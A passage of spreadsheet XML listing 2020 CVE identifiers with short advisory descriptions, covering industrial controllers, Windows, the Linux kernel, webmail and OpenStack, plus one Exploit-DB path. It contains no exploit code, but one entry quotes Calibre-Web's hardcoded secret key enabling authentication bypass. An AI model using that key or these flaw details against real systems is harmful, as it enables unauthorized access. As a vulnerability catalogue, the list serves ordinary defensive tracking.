    <t>Improper Authentication vulnerability in WAGO 750-8XX series with FW version &lt;= FW03 allows an attacker to change the settings of the devices by sending specifically constructed requests without authentication This issue affects: WAGO 750-362, WAGO 750-363, WAGO 750-823, WAGO 750-832/xxx-xxx, WAGO 750-862, WAGO 750-891, WAGO 750-890/xxx-xxx in versions FW03 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-12507</t>
  </si>
  <si>
    <t>In s::can moni::tools before version 4.2 an authenticated attacker could get full access to the database through SQL injection. This may result in loss of confidentiality, loss of integrity and DoS.</t>
  </si>
  <si>
    <t>CVE-2020-12508</t>
  </si>
  <si>
    <t>In s::can moni::tools in versions below 4.2 an unauthenticated attacker could get any file from the device by path traversal in the image-relocator module.</t>
  </si>
  <si>
    <t>CVE-2020-12509</t>
  </si>
  <si>
    <t>In s::can moni::tools in versions below 4.2 an unauthenticated attacker could get any file from the device by path traversal in the camera-file module.</t>
  </si>
  <si>
    <t>CVE-2020-1251</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1207, CVE-2020-1247, CVE-2020-1253, CVE-2020-1310.</t>
  </si>
  <si>
    <t>CVE-2020-12510</t>
  </si>
  <si>
    <t>The default installation path of the TwinCAT XAR 3.1 software in all versions is underneath C:\TwinCAT. If the directory does not exist it and further subdirectories are created with permissions which allow every local user to modify the content. The default installation registers TcSysUI.exe for automatic execution upon log in of a user. If a less privileged user has a local account he or she can replace TcSysUI.exe. It will be executed automatically by another user during login. This is also true for users with administrative access. Consequently, a less privileged user can trick a higher privileged user into executing code he or she modified this way. By default Beckhoff’s IPCs are shipped with TwinCAT software installed this way and with just a single local user configured. Thus the vulnerability exists if further less privileged users have been added.</t>
  </si>
  <si>
    <t>CVE-2020-12511</t>
  </si>
  <si>
    <t>Pepperl+Fuchs Comtrol IO-Link Master in Version 1.5.48 and below is prone to a Cross-Site Request Forgery (CSRF) in the web interface.</t>
  </si>
  <si>
    <t>CVE-2020-12512</t>
  </si>
  <si>
    <t>Pepperl+Fuchs Comtrol IO-Link Master in Version 1.5.48 and below is prone to an authenticated reflected POST Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-12513</t>
  </si>
  <si>
    <t>Pepperl+Fuchs Comtrol IO-Link Master in Version 1.5.48 and below is prone to an authenticated blind OS Command Injection.</t>
  </si>
  <si>
    <t>CVE-2020-12514</t>
  </si>
  <si>
    <t>Pepperl+Fuchs Comtrol IO-Link Master in Version 1.5.48 and below is prone to a NULL Pointer Dereference that leads to a DoS in discoveryd</t>
  </si>
  <si>
    <t>CVE-2020-12516</t>
  </si>
  <si>
    <t>Older firmware versions (FW1 up to FW10) of the WAGO PLC family 750-88x and 750-352 are vulnerable for a special denial of service attack.</t>
  </si>
  <si>
    <t>CVE-2020-12517</t>
  </si>
  <si>
    <t>On Phoenix Contact PLCnext Control Devices versions before 2021.0 LTS an authenticated low privileged user could embed malicious Javascript code to gain admin rights when the admin user visits the vulnerable website (local privilege escalation).</t>
  </si>
  <si>
    <t>CVE-2020-12518</t>
  </si>
  <si>
    <t>On Phoenix Contact PLCnext Control Devices versions before 2021.0 LTS an attacker can use the knowledge gained by reading the insufficiently protected sensitive information to plan further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-12519</t>
  </si>
  <si>
    <t>On Phoenix Contact PLCnext Control Devices versions before 2021.0 LTS an attacker can use this vulnerability i.e. to open a reverse shell with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-1252</t>
  </si>
  <si>
    <t>CVE-2020-12521</t>
  </si>
  <si>
    <t>On Phoenix Contact PLCnext Control Devices versions before 2021.0 LTS a specially crafted LLDP packet may lead to a high system load in the PROFINET stack. An attacker can cause failure of system services or a complete reboot.</t>
  </si>
  <si>
    <t>CVE-2020-12522</t>
  </si>
  <si>
    <t>The reported vulnerability allows an attacker who has network access to the device to execute code with specially crafted packets in WAGO Series PFC 100 (750-81xx/xxx-xxx), Series PFC 200 (750-82xx/xxx-xxx), Series Wago Touch Panel 600 Standard Line (762-4xxx), Series Wago Touch Panel 600 Advanced Line (762-5xxx), Series Wago Touch Panel 600 Marine Line (762-6xxx) with firmware versions &lt;=FW10.</t>
  </si>
  <si>
    <t>CVE-2020-12523</t>
  </si>
  <si>
    <t>On Phoenix Contact mGuard Devices versions before 8.8.3 LAN ports get functional after reboot even if they are disabled in the device configuration. For mGuard devices with integrated switch on the LAN side, single switch ports can be disabled by device configuration. After a reboot these ports get functional independent from their configuration setting: Missing Initialization of Resource</t>
  </si>
  <si>
    <t>CVE-2020-12524</t>
  </si>
  <si>
    <t>Uncontrolled Resource Consumption can be exploited to cause the Phoenix Contact HMIs BTP 2043W, BTP 2070W and BTP 2102W in all versions to become unresponsive and not accurately update the display content (Denial of Service).</t>
  </si>
  <si>
    <t>CVE-2020-12525</t>
  </si>
  <si>
    <t>M&amp;M Software fdtCONTAINER Component in versions below 3.5.20304.x and between 3.6 and 3.6.20304.x is vulnerable to deserialization of untrusted data in its project storage.</t>
  </si>
  <si>
    <t>CVE-2020-12526</t>
  </si>
  <si>
    <t>TwinCAT OPC UA Server in versions up to 2.3.0.12 and IPC Diagnostics UA Server in versions up to 3.1.0.1 from Beckhoff Automation GmbH &amp; Co. KG are vulnerable to denial of service attacks. The attacker needs to send several specifically crafted requests to the running OPC UA server. After some of these requests the OPC UA server is no longer responsive to any client. This is without effect to the real-time functionality of IPCs.</t>
  </si>
  <si>
    <t>CVE-2020-12527</t>
  </si>
  <si>
    <t>An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2. Improper access validation allows a logged in user to shutdown or reboot devices in his account without having corresponding permissions.</t>
  </si>
  <si>
    <t>CVE-2020-12528</t>
  </si>
  <si>
    <t>An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2. Improper use of access validation allows a logged in user to kill web2go sessions in the account he should not have access to.</t>
  </si>
  <si>
    <t>CVE-2020-12529</t>
  </si>
  <si>
    <t>An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2 There is a SSRF in the LDAP access check, allowing an attacker to scan for open ports.</t>
  </si>
  <si>
    <t>CVE-2020-1253</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1310.</t>
  </si>
  <si>
    <t>CVE-2020-12530</t>
  </si>
  <si>
    <t>An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2. There is an XSS issue in the redirect.php allowing an attacker to inject code via a get parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1254</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members.A locally authenticated attacker could run arbitrary code with elevated system privileges, aka 'Windows Modules Installer Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1255</t>
  </si>
  <si>
    <t>CVE-2020-1256</t>
  </si>
  <si>
    <t>CVE-2020-1257</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations, aka 'Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1278, CVE-2020-1293.</t>
  </si>
  <si>
    <t>CVE-2020-1258</t>
  </si>
  <si>
    <t>CVE-2020-1259</t>
  </si>
  <si>
    <t>A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged, aka 'Windows Host Guardian Service Security Feature Bypass Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12593</t>
  </si>
  <si>
    <t>Symantec Endpoint Detection &amp; Response, prior to 4.5, may be susceptible to an information disclosure issue, which is a type of vulnerability that could potentially allow unauthorized access to data.</t>
  </si>
  <si>
    <t>CVE-2020-12594</t>
  </si>
  <si>
    <t>A privilege escalation flaw allows a malicious, authenticated, privileged CLI user to escalate their privileges on the system and gain full control over the SMG appliance. This affects SMG prior to 10.7.4.</t>
  </si>
  <si>
    <t>CVE-2020-12595</t>
  </si>
  <si>
    <t>An information disclosure flaw allows a malicious, authenticated, privileged web UI user to obtain a password for a remote SCP backup server that they might not otherwise be authorized to access. This affects SMG prior to 10.7.4.</t>
  </si>
  <si>
    <t>CVE-2020-1260</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230.</t>
  </si>
  <si>
    <t>exploits/windows/local/48448.txt</t>
  </si>
  <si>
    <t>SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions</t>
  </si>
  <si>
    <t>2020-05-11</t>
  </si>
  <si>
    <t>CVE-2020-12603</t>
  </si>
  <si>
    <t>Envoy version 1.14.2, 1.13.2, 1.12.4 or earlier may consume excessive amounts of memory when proxying HTTP/2 requests or responses with many small (i.e. 1 byte) data frames.</t>
  </si>
  <si>
    <t>CVE-2020-12604</t>
  </si>
  <si>
    <t>Envoy version 1.14.2, 1.13.2, 1.12.4 or earlier is susceptible to increased memory usage in the case where an HTTP/2 client requests a large payload but does not send enough window updates to consume the entire stream and does not reset the stream.</t>
  </si>
  <si>
    <t>CVE-2020-12605</t>
  </si>
  <si>
    <t>Envoy version 1.14.2, 1.13.2, 1.12.4 or earlier may consume excessive amounts of memory when processing HTTP/1.1 headers with long field names or requests with long URLs.</t>
  </si>
  <si>
    <t>CVE-2020-12606</t>
  </si>
  <si>
    <t>An issue was discovered in DB Soft SGLAC before 20.05.001. The ProcedimientoGenerico method in the SVCManejador.svc webservice of the SGLAC web frontend allows an attacker to run arbitrary SQL commands on the SQL Server. Command execution can be easily achieved by using the xp_cmdshell stored procedure.</t>
  </si>
  <si>
    <t>CVE-2020-12607</t>
  </si>
  <si>
    <t>An issue was discovered in fastecdsa before 2.1.2. When using the NIST P-256 curve in the ECDSA implementation, the point at infinity is mishandled. This means that for an extreme value in k and s^-1, the signature verification fails even if the signature is correct. This behavior is not solely a usability problem. There are some threat models where an attacker can benefit by successfully guessing users for whom signature verification will fail.</t>
  </si>
  <si>
    <t>CVE-2020-12608</t>
  </si>
  <si>
    <t>An issue was discovered in SolarWinds MSP PME (Patch Management Engine) Cache Service before 1.1.15 in the Advanced Monitoring Agent. There are insecure file permissions for %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\config\. This can lead to code execution by changing the CacheService.xml SISServerURL parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1261</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory, aka 'Windows Error Reporting Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1263.</t>
  </si>
  <si>
    <t>CVE-2020-12618</t>
  </si>
  <si>
    <t>eM Client before 7.2.33412.0 automatically imported S/MIME certificates and thereby silently replaced existing ones. This allowed a man-in-the-middle attacker to obtain an email-validated S/MIME certificate from a trusted CA and replace the public key of the entity to be impersonated. This enabled the attacker to decipher further communication. The entire attack could be accomplished by sending a single email.</t>
  </si>
  <si>
    <t>CVE-2020-12619</t>
  </si>
  <si>
    <t>MailMate before 1.11 automatically imported S/MIME certificates and thereby silently replaced existing ones. This allowed a man-in-the-middle attacker to obtain an email-validated S/MIME certificate from a trusted CA and replace the public key of the entity to be impersonated. This enabled the attacker to decipher further communication. The entire attack could be accomplished by sending a single email.</t>
  </si>
  <si>
    <t>CVE-2020-1262</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-12620</t>
  </si>
  <si>
    <t>Pi-hole 4.4 allows a user able to write to /etc/pihole/dns-servers.conf to escalate privileges through command injection (shell metacharacters after an IP address).</t>
  </si>
  <si>
    <t>CVE-2020-12621</t>
  </si>
  <si>
    <t>The Teamwire application 5.3.0 for Android allows physically proximate attackers to exploit a flaw related to the pass-code component.</t>
  </si>
  <si>
    <t>CVE-2020-12624</t>
  </si>
  <si>
    <t>The League application before 2020-05-02 on Android sends a bearer token in an HTTP Authorization header to an arbitrary web site that hosts an external image because an OkHttp object is reused, which allows remote attackers to hijack sessions.</t>
  </si>
  <si>
    <t>CVE-2020-12625</t>
  </si>
  <si>
    <t>An issue was discovered in Roundcube Webmail before 1.4.4. There is a cross-site scripting (XSS) vulnerability in rcube_washtml.php because JavaScript code can occur in the CDATA of an HTML message.</t>
  </si>
  <si>
    <t>CVE-2020-12626</t>
  </si>
  <si>
    <t>An issue was discovered in Roundcube Webmail before 1.4.4. A CSRF attack can cause an authenticated user to be logged out because POST was not considered.</t>
  </si>
  <si>
    <t>CVE-2020-12627</t>
  </si>
  <si>
    <t>Calibre-Web 0.6.6 allows authentication bypass because of the 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT' hardcoded secret key.</t>
  </si>
  <si>
    <t>CVE-2020-12629</t>
  </si>
  <si>
    <t>include/class.sla.php in osTicket before 1.14.2 allows XSS via the SLA Name.</t>
  </si>
  <si>
    <t>CVE-2020-1263</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory, aka 'Windows Error Reporting Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1261.</t>
  </si>
  <si>
    <t>CVE-2020-12635</t>
  </si>
  <si>
    <t>XSS exists in the WebForms Pro M2 extension before 2.9.17 for Magento 2 via the textarea field.</t>
  </si>
  <si>
    <t>CVE-2020-12637</t>
  </si>
  <si>
    <t>Zulip Desktop before 5.2.0 has Missing SSL Certificate Validation because all validation was inadvertently disabled during an attempt to recognize the ignoreCerts option.</t>
  </si>
  <si>
    <t>CVE-2020-12638</t>
  </si>
  <si>
    <t>An encryption-bypass issue was discovered on Espressif ESP-IDF devices through 4.2, ESP8266_NONOS_SDK devices through 3.0.3, and ESP8266_RTOS_SDK devices through 3.3. Broadcasting forged beacon frames forces a device to change its authentication mode to OPEN, effectively disabling its 802.11 encryption.</t>
  </si>
  <si>
    <t>CVE-2020-12639</t>
  </si>
  <si>
    <t>phpList before 3.5.3 allows XSS, with resultant privilege elevation, via lists/admin/template.php.</t>
  </si>
  <si>
    <t>CVE-2020-1264</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-12640</t>
  </si>
  <si>
    <t>Roundcube Webmail before 1.4.4 allows attackers to include local files and execute code via directory traversal in a plugin name to rcube_plugin_api.php.</t>
  </si>
  <si>
    <t>CVE-2020-12641</t>
  </si>
  <si>
    <t>rcube_image.php in Roundcube Webmail before 1.4.4 allows attackers to execute arbitrary code via shell metacharacters in a configuration setting for im_convert_path or im_identify_path.</t>
  </si>
  <si>
    <t>CVE-2020-12642</t>
  </si>
  <si>
    <t>An issue was discovered in service-api before 4.3.12 and 5.x before 5.1.1 for Report Portal. It allows XXE, with resultant secrets disclosure and SSRF, via JUnit XML launch import.</t>
  </si>
  <si>
    <t>CVE-2020-12643</t>
  </si>
  <si>
    <t>OX App Suite 7.10.3 and earlier has Incorrect Access Control via an /api/subscriptions request for a snippet containing an email address.</t>
  </si>
  <si>
    <t>CVE-2020-12644</t>
  </si>
  <si>
    <t>OX App Suite 7.10.3 and earlier allows SSRF, related to the mail account API and the /folder/list API.</t>
  </si>
  <si>
    <t>CVE-2020-12645</t>
  </si>
  <si>
    <t>OX App Suite 7.10.1 to 7.10.3 has improper input validation for rate limits with a crafted User-Agent header, spoofed vacation notices, and /apps/load memory consumption.</t>
  </si>
  <si>
    <t>CVE-2020-12646</t>
  </si>
  <si>
    <t>OX App Suite 7.10.3 and earlier allows XSS via text/x-javascript, text/rdf, or a PDF document.</t>
  </si>
  <si>
    <t>CVE-2020-12647</t>
  </si>
  <si>
    <t>Unisys ALGOL Compiler 58.1 before 58.1a.15, 59.1 before 59.1a.9, and 60.0 before 60.0a.5 can emit invalid code sequences under rare circumstances related to syntax. The resulting code could, for example, trigger a system fault or adversely affect confidentiality, integrity, and availability.</t>
  </si>
  <si>
    <t>CVE-2020-12648</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in TinyMCE 5.2.1 and earlier allows remote attackers to inject arbitrary web script when configured in classic editing mode.</t>
  </si>
  <si>
    <t>CVE-2020-12649</t>
  </si>
  <si>
    <t>Gurbalib through 2020-04-30 allows lib/cmds/player/help.c directory traversal for reading administrative paths.</t>
  </si>
  <si>
    <t>CVE-2020-1265</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334.</t>
  </si>
  <si>
    <t>CVE-2020-12651</t>
  </si>
  <si>
    <t>SecureCRT before 8.7.2 allows remote attackers to execute arbitrary code via an Integer Overflow and a Buffer Overflow because a banner can trigger a line number to CSI functions that exceeds INT_MAX.</t>
  </si>
  <si>
    <t>CVE-2020-12652</t>
  </si>
  <si>
    <t>The __mptctl_ioctl function in drivers/message/fusion/mptctl.c in the Linux kernel before 5.4.14 allows local users to hold an incorrect lock during the ioctl operation and trigger a race condition, i.e., a "double fetch" vulnerability, aka CID-28d76df18f0a. NOTE: the vendor states "The security impact of this bug is not as bad as it could have been because these operations are all privileged and root already has enormous destructive power."</t>
  </si>
  <si>
    <t>CVE-2020-12653</t>
  </si>
  <si>
    <t>An issue was found in Linux kernel before 5.5.4. The mwifiex_cmd_append_vsie_tlv() function in drivers/net/wireless/marvell/mwifiex/scan.c allows local users to gain privileges or cause a denial of service because of an incorrect memcpy and buffer overflow, aka CID-b70261a288ea.</t>
  </si>
  <si>
    <t>CVE-2020-12654</t>
  </si>
  <si>
    <t>An issue was found in Linux kernel before 5.5.4. mwifiex_ret_wmm_get_status() in drivers/net/wireless/marvell/mwifiex/wmm.c allows a remote AP to trigger a heap-based buffer overflow because of an incorrect memcpy, aka CID-3a9b153c5591.</t>
  </si>
  <si>
    <t>CVE-2020-12655</t>
  </si>
  <si>
    <t>An issue was discovered in xfs_agf_verify in fs/xfs/libxfs/xfs_alloc.c in the Linux kernel through 5.6.10. Attackers may trigger a sync of excessive duration via an XFS v5 image with crafted metadata, aka CID-d0c7feaf8767.</t>
  </si>
  <si>
    <t>CVE-2020-12656</t>
  </si>
  <si>
    <t>** DISPUTED ** gss_mech_free in net/sunrpc/auth_gss/gss_mech_switch.c in the rpcsec_gss_krb5 implementation in the Linux kernel through 5.6.10 lacks certain domain_release calls, leading to a memory leak. Note: This was disputed with the assertion that the issue does not grant any access not already available. It is a problem that on unloading a specific kernel module some memory is leaked, but loading kernel modules is a privileged operation. A user could also write a kernel module to consume any amount of memory they like and load that replicating the effect of this bug.</t>
  </si>
  <si>
    <t>CVE-2020-12657</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.6.5. There is a use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body.</t>
  </si>
  <si>
    <t>CVE-2020-12658</t>
  </si>
  <si>
    <t>** DISPUTED ** gssproxy (aka gss-proxy) before 0.8.3 does not unlock cond_mutex before pthread exit in gp_worker_main() in gp_workers.c. NOTE: An upstream comment states "We are already on a shutdown path when running the code in question, so a DoS there doesn't make any sense, and there has been no additional information provided us (as upstream) to indicate why this would be a problem."</t>
  </si>
  <si>
    <t>CVE-2020-12659</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.6.7. xdp_umem_reg in net/xdp/xdp_umem.c has an out-of-bounds write (by a user with the CAP_NET_ADMIN capability) because of a lack of headroom validation.</t>
  </si>
  <si>
    <t>CVE-2020-1266</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-12662</t>
  </si>
  <si>
    <t>Unbound before 1.10.1 has Insufficient Control of Network Message Volume, aka an "NXNSAttack" issue. This is triggered by random subdomains in the NSDNAME in NS records.</t>
  </si>
  <si>
    <t>CVE-2020-12663</t>
  </si>
  <si>
    <t>Unbound before 1.10.1 has an infinite loop via malformed DNS answers received from upstream servers.</t>
  </si>
  <si>
    <t>CVE-2020-12666</t>
  </si>
  <si>
    <t>macaron before 1.3.7 has an open redirect in the static handler, as demonstrated by the http://127.0.0.1:4000//example.com/ URL.</t>
  </si>
  <si>
    <t>CVE-2020-12667</t>
  </si>
  <si>
    <t>Knot Resolver before 5.1.1 allows traffic amplification via a crafted DNS answer from an attacker-controlled server, aka an "NXNSAttack" issue. This is triggered by random subdomains in the NSDNAME in NS records.</t>
  </si>
  <si>
    <t>CVE-2020-12668</t>
  </si>
  <si>
    <t>Jinjava before 2.5.4 allow access to arbitrary classes by calling Java methods on objects passed into a Jinjava context. This could allow for abuse of the application class loader, including Arbitrary File Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-12669</t>
  </si>
  <si>
    <t>core/get_menudiv.php in Dolibarr before 11.0.4 allows remote authenticated attackers to bypass intended access restrictions via a non-alphanumeric menu parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1267</t>
  </si>
  <si>
    <t>CVE-2020-12670</t>
  </si>
  <si>
    <t>XSS exists in Webmin 1.941 and earlier affecting the Save function of the Read User Email Module / mailboxes Endpoint when attempting to save HTML emails. This module parses any output without sanitizing SCRIPT elements, as opposed to the View function, which sanitizes the input correctly. A malicious user can send any JavaScript payload into the message body and execute it if the user decides to save that email.</t>
  </si>
  <si>
    <t>CVE-2020-12672</t>
  </si>
  <si>
    <t>GraphicsMagick through 1.3.35 has a heap-based buffer overflow in ReadMNGImage in coders/png.c.</t>
  </si>
  <si>
    <t>CVE-2020-12673</t>
  </si>
  <si>
    <t>In Dovecot before 2.3.11.3, sending a specially formatted NTLM request will crash the auth service because of an out-of-bounds read.</t>
  </si>
  <si>
    <t>CVE-2020-12674</t>
  </si>
  <si>
    <t>In Dovecot before 2.3.11.3, sending a specially formatted RPA request will crash the auth service because a length of zero is mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-12675</t>
  </si>
  <si>
    <t>The mappress-google-maps-for-wordpress plugin before 2.54.6 for WordPress does not correctly implement capability checks for AJAX functions related to creation/retrieval/deletion of PHP template files, leading to Remote Code Execution. NOTE: this issue exists because of an incomplete fix for CVE-2020-12077.</t>
  </si>
  <si>
    <t>CVE-2020-12676</t>
  </si>
  <si>
    <t>FusionAuth fusionauth-samlv2 0.2.3 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack".</t>
  </si>
  <si>
    <t>CVE-2020-12677</t>
  </si>
  <si>
    <t>An issue was discovered in Progress MOVEit Automation Web Admin. A Web Admin application endpoint failed to adequately sanitize malicious input, which could allow an unauthenticated attacker to execute arbitrary code in a victim's browser, aka XSS. This affects 2018 - 2018.0 prior to 2018.0.3, 2018 SP1 - 2018.2 prior to 2018.2.3, 2018 SP2 - 2018.3 prior to 2018.3.7, 2019 - 2019.0 prior to 2019.0.3, 2019.1 - 2019.1 prior to 2019.1.2, and 2019.2 - 2019.2 prior to 2019.2.2.</t>
  </si>
  <si>
    <t>CVE-2020-12679</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in the Mitel ShoreTel Conference Web Application 19.50.1000.0 before MiVoice Connect 18.7 SP2 allows remote attackers to inject arbitrary JavaScript and HTML via the PATH_INFO to home.php.</t>
  </si>
  <si>
    <t>CVE-2020-1268</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when a Windows service improperly handles objects in memory, aka 'Windows Service Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12680</t>
  </si>
  <si>
    <t>** DISPUTED ** Avira Free Antivirus through 15.0.2005.1866 allows local users to discover user credentials. The functions of the executable file Avira.PWM.NativeMessaging.exe are aimed at collecting credentials stored in Chrome, Firefox, Opera, and Edge. The executable does not verify the calling program and thus a request such as fetchChromePasswords or fetchCredentials will succeed. NOTE: some third parties have stated that this is "not a vulnerability."</t>
  </si>
  <si>
    <t>CVE-2020-12681</t>
  </si>
  <si>
    <t>Missing TLS certificate validation on 3xLogic Infinias eIDC32 devices through 3.4.125 allows an attacker to intercept/control the channel by which door lock policies are applied.</t>
  </si>
  <si>
    <t>CVE-2020-12683</t>
  </si>
  <si>
    <t>Katyshop2 before 2.12 has multiple stored XSS issues.</t>
  </si>
  <si>
    <t>CVE-2020-12684</t>
  </si>
  <si>
    <t>XXE injection can occur in i-net Clear Reports 2019 19.0.287 (Designer), as used in i-net HelpDesk and other products, when XML input containing a reference to an external entity is processed by a weakly configured XML parser.</t>
  </si>
  <si>
    <t>CVE-2020-12685</t>
  </si>
  <si>
    <t>XSS in the admin help system admin/help.html and admin/quicklinks.html in Interchange 4.7.0 through 5.11.x allows remote attackers to steal credentials or data via browser JavaScript.</t>
  </si>
  <si>
    <t>CVE-2020-12687</t>
  </si>
  <si>
    <t>An issue was discovered in Serpico before 1.3.3. The /admin/attacments_backup endpoint can be requested by non-admin authenticated users. This means that an attacker with a user account can retrieve all of the attachments of all users (including administrators) from the database.</t>
  </si>
  <si>
    <t>CVE-2020-12689</t>
  </si>
  <si>
    <t>An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. Any user authenticated within a limited scope (trust/oauth/application credential) can create an EC2 credential with an escalated permission, such as obtaining admin while the user is on a limited viewer role. This potentially allows a malicious user to act as the admin on a project another user has the admin role on, which can effectively grant that user global admin privileges.</t>
  </si>
  <si>
    <t>CVE-2020-1269</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-12690</t>
  </si>
  <si>
    <t>An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The list of roles provided for an OAuth1 access token is silently ignored. Thus, when an access token is used to request a keystone token, the keystone token contains every role assignment the creator had for the project. This results in the provided keystone token having more role assignments than the creator intended, possibly giving unintended escalated access.</t>
  </si>
  <si>
    <t>CVE-2020-12691</t>
  </si>
  <si>
    <t>An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. Any authenticated user can create an EC2 credential for themselves for a project that they have a specified role on, and then perform an update to the credential user and project, allowing them to masquerade as another user. This potentially allows a malicious user to act as the admin on a project another user has the admin role on, which can effectively grant that user global admin privileges.</t>
  </si>
  <si>
    <t>CVE-2020-12692</t>
  </si>
  <si>
    <t>An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The EC2 API doesn't have a signature TTL check for AWS Signature V4. An attacker can sniff the Authorization header, and then use it to reissue an OpenStack token an unlimited number of times.</t>
  </si>
  <si>
    <t>CVE-2020-12693</t>
  </si>
  <si>
    <t>Slurm 19.05.x before 19.05.7 and 20.02.x before 20.02.3, in the rare case where Message Aggregation is enabled, allows Authentication Bypass via an Alternate Path or Channel. A race condition allows a user to launch a process as an arbitrary user.</t>
  </si>
  <si>
    <t>CVE-2020-12695</t>
  </si>
  <si>
    <t>The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2020-12696</t>
  </si>
  <si>
    <t>The iframe plugin before 4.5 for WordPress does not sanitize a URL.</t>
  </si>
  <si>
    <t>CVE-2020-12697</t>
  </si>
  <si>
    <t>The direct_mail extension through 5.2.3 for TYPO3 allows Denial of Service via log entries.</t>
  </si>
  <si>
    <t>CVE-2020-12698</t>
  </si>
  <si>
    <t>The direct_mail extension through 5.2.3 for TYPO3 has Broken Access Control for newsletter subscriber tables.</t>
  </si>
  <si>
    <t>CVE-2020-12699</t>
  </si>
  <si>
    <t>The direct_mail extension through 5.2.3 for TYPO3 has an Open Redirect via jumpUrl.</t>
  </si>
  <si>
